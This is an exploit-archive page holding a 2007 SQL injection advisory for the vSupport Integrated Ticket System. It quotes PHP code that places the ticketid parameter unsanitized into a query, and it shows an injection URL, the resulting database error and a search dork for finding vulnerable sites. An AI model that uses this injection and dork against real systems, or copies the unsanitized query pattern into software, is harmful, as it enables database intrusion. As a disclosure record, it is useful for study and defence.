vsupportits-sql.txt

vsupportits-sql.txt: Posted Jun 11, 2007; Authored by rUnViRuS | Site sec-area.com; vSupport Integrated Ticket System version 3.x suffers from a SQL injection vulnerability.; tags | exploit, sql injection; SHA-256 | e0c6b4fa6c10b0e9150a0d0fbc3df86491f6957acf57e618654f9863d3254535; Download | Favorite | View

vsupportits-sql.txt

+--------------------------------------------------------------------
+
+ Affected Software .: vSupport Integrated Ticket System
+ Venedor ...........: http://www.cmgsccc.com 
+ Class .............: SQL injection
+ Dork ..............: inurl:vBSupport.php
+ Found by ..........: rUnViRuS
+ Original advisory .: http://www.sec-area.com/
+ Contact ...........: stormhacker[at]hotmail[.]com
+
+--------------------------------------------------------------------
+ PoC:
+
+ Database error SQL
+--------------------------------------------------------------------
    // do not limit the users access
    $fromuseraccess = "";
  }

  // get the info about the ticket first
  if ($ticket = $db->query_first("
    SELECT ticket.*
    " . iif($vbulletin->options['privallowicons'], ",icon.title AS icontitle, icon.iconpath") . "
    FROM " . TABLE_PREFIX . "ticket as ticket
    " . iif($vbulletin->options['privallowicons'], "LEFT JOIN " . TABLE_PREFIX . "icon AS icon ON(icon.iconid = ticket.iconid)") . "
    WHERE ticketid=" . $vbulletin->GPC['ticketid'] . "
    $fromuseraccess
  "))
  {


+--------------------------------------------------------------------
+  An example:
+--------------------------------------------------------------------

http://localhost/4/vBSupport.php?do=showticket&ticketid=1/**/union/**/select/**/

+--------------------------------------------------------------------
+  output:
+--------------------------------------------------------------------

MySQL Error  : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 5
Error Number : 1064


Date         : Monday, July 2nd 2007 @ 02:54:54 PM
Script       : http://localhost/4/vBSupport.php?do=showticket&ticketid=1/**/union/**/select/**/
Referrer     : 
IP Address   : 127.0.0.1
Username     : admin
Classname    : vb_database
Invalid SQL:

    SELECT ticket.*
    ,icon.title AS icontitle, icon.iconpath
    FROM ticket as ticket
    LEFT JOIN icon AS icon ON(icon.iconid = ticket.iconid)
    WHERE ticketid=1/**/union/**/select/**/;
+--------------------------------------------------------------------
+  Exploit :
+--------------------------------------------------------------------
http://localhost/4/vBSupport.php?do=showticket&ticketid=[SQL]

+--------------------------------------------------------------------
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+--------------------------------------------------------------------
+ [W]orld [D]efacers [T]eam
+ Greets:
+ || rUnViRuS || - || papipsycho || - || HeX || - || Linux Master || BlackWHITE ||
+ || Pro Hacker || - || DARKFIRE ||
+
+-------------------------[ W D T ]----------------------------------

Top Authors In Last 30 Days

Red Hat 249 files
Jay Turla 150 files
indoushka 147 files
Ubuntu 62 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,104)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,118)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (387)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,071)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,733)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,808)
UNIX (9,452)
UnixWare (188)
Windows (6,763)
Other

vsupportits-sql.txt

vsupportits-sql.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

vsupportits-sql.txt

Share This

vsupportits-sql.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems